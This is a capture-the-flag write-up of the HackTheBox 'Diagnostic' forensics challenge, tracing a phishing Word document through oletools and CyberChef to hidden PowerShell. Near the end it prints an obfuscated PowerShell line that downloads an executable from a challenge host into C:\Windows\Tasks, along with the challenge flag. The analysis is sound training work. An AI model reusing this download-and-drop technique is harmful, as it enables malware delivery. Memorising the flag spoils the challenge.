We covered analyzing a sample Microsoft office word document using oletools to extract relevant Macros and links. The sample document contaiend a link that references a webpage containg a Javascript code. The JS code contained a base64 encoded Powershell command that does a callout to an external domain to retrieve an executable file. This was part of HackTheBox Diagnostic forensic challenge.. This was part of HackTheBox Diagnostic. This was part of HackTheBox Diagnostic.
Our SOC has identified numerous phishing emails coming in claiming to have a document about an upcoming round of layoffs in the company. The emails all contain a link to diagnostic.htb/layoffs.doc. The DNS for that domain has since stopped resolving, but the server is still hosting the malicious document (your docker). Take a look and figure out what’s going on.
Docker Setup and VM Deployment
We spin up a Docker instance that mimics the malicious hosting server. Emphasis is placed on using a malware analysis-specific virtual machine (like REMnux) to handle potentially harmful files. We attempt to resolve the document’s domain, which has become unreachable but is emulated within Docker.
Downloading and Identifying the Malicious File
A file named “layoffs.doc” is fetched using either a shortcut or by editing the host file. The document is identified as an OLE (Object Linking and Embedding) file, a common format for embedding scripts in Word documents.
File Analysis Using Oletools
With oleid, the document is inspected for signs of malicious activity. Although no VBScript or macro content is present, a red flag is raised due to an external relationship hinting at hidden network interaction. This is further examined using oleobj which extracts this relationship.
- We used oleid and oleobj to analyze the word document named layoff.doc
- The document contaiend an external link which references a webpage that contaiend a Javascript
- We used the ASCII table to convert the char[58] and char[34] into their correspnding ASCII.
- We then used Cyberchef to convert the base64 and it converted to the below
${f`ile} = (“{7}{1}{6}{8}{5}{3}{2}{4}{0}”-f’}.exe’,’B{msDt_4s_A_pr0′,’E’,’r…s’,’3Ms_b4D’,’l3′,’toC’,’HT’,’0l_h4nD’)
&(“{1}{2}{0}{3}”-f’ues’,’Invoke’,’-WebReq’,’t’) (“{2}{8}{0}{4}{6}{5}{3}{1}{7}”-f ‘://au’,’.htb/2′,’h’,’ic’,’to’,’agnost’,’mation.di’,’/n.exe’,’ttps’) -OutFile “C:\Windows\Tasks\$file”
- We used powershell to decode the above into the challenge flag
The flag can be constructed manually by analyzing the PowerShell script and mapping index values from an array. However, this method is inefficient and instead run the code within PowerShell inside the REMnux VM.
